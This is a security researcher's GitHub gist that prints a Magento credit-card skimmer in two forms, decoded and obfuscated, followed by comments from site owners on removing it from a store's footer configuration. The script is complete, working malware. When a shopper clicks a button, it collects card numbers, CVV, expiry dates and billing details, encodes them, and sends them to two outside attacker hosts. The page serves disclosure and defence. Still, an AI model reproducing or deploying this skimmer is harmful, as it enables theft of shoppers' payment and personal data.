Skip to content

Instantly share code, notes, and snippets.

@gwillem gwillem/decoded.js
Last active Aug 29, 2019

Embed
What would you like to do?
962 stores found breached on the 4th of July - https://sansec.io
// Decoded by Sanguine Security <info@sansec.io>
String.prototype.hexEncode = function() {
var a, b;
var output = '';
for (b = 0; b < this.length; b++) {
a = this.charCodeAt(b).toString(16);
output += ('000' + a).slice(-4)
};
return output
};
function obfuscate(arg) {
var b64 = btoa(arg);
var b64hex = (b64.hexEncode());
var blob = '';
for (var i = 0; i < b64hex.length; i++) {
blob += (b64hex[i].charCodeAt(0) << 3) + '*'
};
var blobb64 = btoa(blob);
return blobb64
}
function addtoev() {
var allButtons = document.getElementsByClassName('button');
for (i = 0; i < allButtons.length; i++) {
allButtons[i].addEventListener('click', function() {
var ccCounter = '';
var serialPayload = '';
if (document.getElementsByName('payment[cc_number]')[0]) {
serialPayload += document.getElementsByName('payment[cc_number]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_cid]')[0]) {
ccCounter = document.getElementsByName('payment[cc_cid]')[0].value;
serialPayload += document.getElementsByName('payment[cc_cid]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_exp_month]')[0]) {
serialPayload += document.getElementsByName('payment[cc_exp_month]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_exp_year]')[0]) {
serialPayload += document.getElementsByName('payment[cc_exp_year]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_owner]')[0]) {
serialPayload += document.getElementsByName('payment[cc_owner]')[0].value + '|'
};
if (document.getElementsByName('billing[firstname]')[0]) {
serialPayload += document.getElementsByName('billing[firstname]')[0].value + '|'
};
if (document.getElementsByName('billing[lastname]')[0]) {
serialPayload += document.getElementsByName('billing[lastname]')[0].value + '|'
};
if (document.getElementsByName('billing[telephone]')[0]) {
serialPayload += document.getElementsByName('billing[telephone]')[0].value + '|'
};
if (document.getElementsByName('billing[street][]')[0]) {
serialPayload += document.getElementsByName('billing[street][]')[0].value + '|'
};
if (document.getElementsByName('billing[city]')[0]) {
serialPayload += document.getElementsByName('billing[city]')[0].value + '|'
};
if (document.getElementsByName('billing[postcode]')[0]) {
serialPayload += document.getElementsByName('billing[postcode]')[0].value + '|'
};
if (document.getElementsByName('billing[region_id]')[0]) {
serialPayload += document.getElementsByName('billing[region_id]')[0].value + '|'
};
if (document.getElementsByName('shipping[country_id]')[0]) {
serialPayload += document.getElementsByName('shipping[country_id]')[0].value + '|'
};
if (ccCounter != '') {
var payloadObj = {
Domain: 'all',
d: obfuscate(serialPayload)
};
rand = Math.floor((Math.random() * 1000000) + 1);
urll = 'https://www.tarrianalee.co.uk/js/mage/adminhtml/wysiwyg/tiny_mce/plugins/magentovariable/img/validate.php?v=' + btoa(JSON.stringify(payloadObj));
var req1 = new XMLHttpRequest();
req1.open('GET', urll, false);
req1.send();
urll = 'http://89.32.251.136/counter/index.php?v=' + btoa(JSON.stringify(payloadObj));
var req2 = new XMLHttpRequest();
req2.open('GET', urll, false);
req2.send()
}
})
}
}
window.addEventListener('load', function() {
addtoev()
})
var _0xe6b4=["hexEncode","prototype","","length","charCodeAt","slice","000","*","button","getElementsByClassName","click","payment[cc_number]","getElementsByName","value","|","payment[cc_cid]","payment[cc_exp_month]","payment[cc_exp_year]","payment[cc_owner]","billing[firstname]","billing[lastname]","billing[telephone]","billing[street][]","billing[city]","billing[postcode]","billing[region_id]","shipping[country_id]","all","random","floor","https://www.tarrianalee.co.uk/js/mage/adminhtml/wysiwyg/tiny_mce/plugins/magentovariable/img/validate.php?v=","stringify","GET","open","send","http://89.32.251.136/counter/index.php?v=","addEventListener","load"];String[_0xe6b4[1]][_0xe6b4[0]]= function(){var _0x3692x1,_0x3692x2;var _0x3692x3=_0xe6b4[2];for(_0x3692x2= 0;_0x3692x2< this[_0xe6b4[3]];_0x3692x2++){_0x3692x1= this[_0xe6b4[4]](_0x3692x2).toString(16);_0x3692x3+= (_0xe6b4[6]+ _0x3692x1)[_0xe6b4[5]](-4)};return _0x3692x3};function sa(_0x3692x5){var _0x3692x6=btoa(_0x3692x5);var _0x3692x7=(_0x3692x6[_0xe6b4[0]]());var _0x3692x8=_0xe6b4[2];for(var _0x3692x2=0;_0x3692x2< _0x3692x7[_0xe6b4[3]];_0x3692x2++){_0x3692x8+= (_0x3692x7[_0x3692x2][_0xe6b4[4]](0)<< 3)+ _0xe6b4[7]};var _0x3692x9=btoa(_0x3692x8);return _0x3692x9}function addtoev(){var _0x3692xb=document[_0xe6b4[9]](_0xe6b4[8]);for(i= 0;i< _0x3692xb[_0xe6b4[3]];i++){_0x3692xb[i][_0xe6b4[36]](_0xe6b4[10],function(){var _0x3692xc=_0xe6b4[2];var _0x3692xd=_0xe6b4[2];if(document[_0xe6b4[12]](_0xe6b4[11])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[11])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[15])[0]){_0x3692xc= document[_0xe6b4[12]](_0xe6b4[15])[0][_0xe6b4[13]];_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[15])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[16])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[16])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[17])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[17])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[18])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[18])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[19])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[19])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[20])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[20])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[21])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[21])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[22])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[22])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[23])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[23])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[24])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[24])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[25])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[25])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[26])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[26])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(_0x3692xc!= _0xe6b4[2]){var _0x3692xe={Domain:_0xe6b4[27],d:sa(_0x3692xd)};rand= Math[_0xe6b4[29]]((Math[_0xe6b4[28]]()* 1000000)+ 1);urll= _0xe6b4[30]+ btoa(JSON[_0xe6b4[31]](_0x3692xe));var _0x3692xf= new XMLHttpRequest();_0x3692xf[_0xe6b4[33]](_0xe6b4[32],urll,false);_0x3692xf[_0xe6b4[34]]();urll= _0xe6b4[35]+ btoa(JSON[_0xe6b4[31]](_0x3692xe));var _0x3692x10= new XMLHttpRequest();_0x3692x10[_0xe6b4[33]](_0xe6b4[32],urll,false);_0x3692x10[_0xe6b4[34]]()}})}}window[_0xe6b4[36]](_0xe6b4[37],function(){addtoev()})
@costicanu

This comment has been minimized.

Copy link

costicanu commented Jul 18, 2019

any idea on how to fix this the security breach on magento?

@gwillem

This comment has been minimized.

Copy link
Owner Author

gwillem commented Jul 26, 2019

@costicanu They use multiple exploits to gain access to these stores. See also https://sansec.io/labs/2019/01/29/magento-module-blacklist/

@temp8888

This comment has been minimized.

Copy link

temp8888 commented Jul 28, 2019

I resolved this. They insert this code into the database; not in the php file system.

table core_config_data > there you will see it in the field design/footer/absolute_footer

or

System -> Configuration -> Design -> Footer -> Miscellaneous HTML

design/footer/absolute_footer Hackers embed malicious code. There will be several rows of spaces to hide from visible sight

edit:

#File: app/code/core/Mage/Page/Block/Html.php
public function getAbsoluteFooter()
{
return Mage::getStoreConfig('design/footer/absolute_footer');
}

Then I figured I didn't need this so I commented it out.

public function getAbsoluteFooter()
{
#return Mage::getStoreConfig('design/footer/absolute_footer');
}

Should also use https://www.magereport.com to identify the security holes

@gwillem

This comment has been minimized.

Copy link
Owner Author

gwillem commented Jul 29, 2019

Mind you, you are battling the symptoms here, not the root cause. If people are able to write to your database, you have bigger problems.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.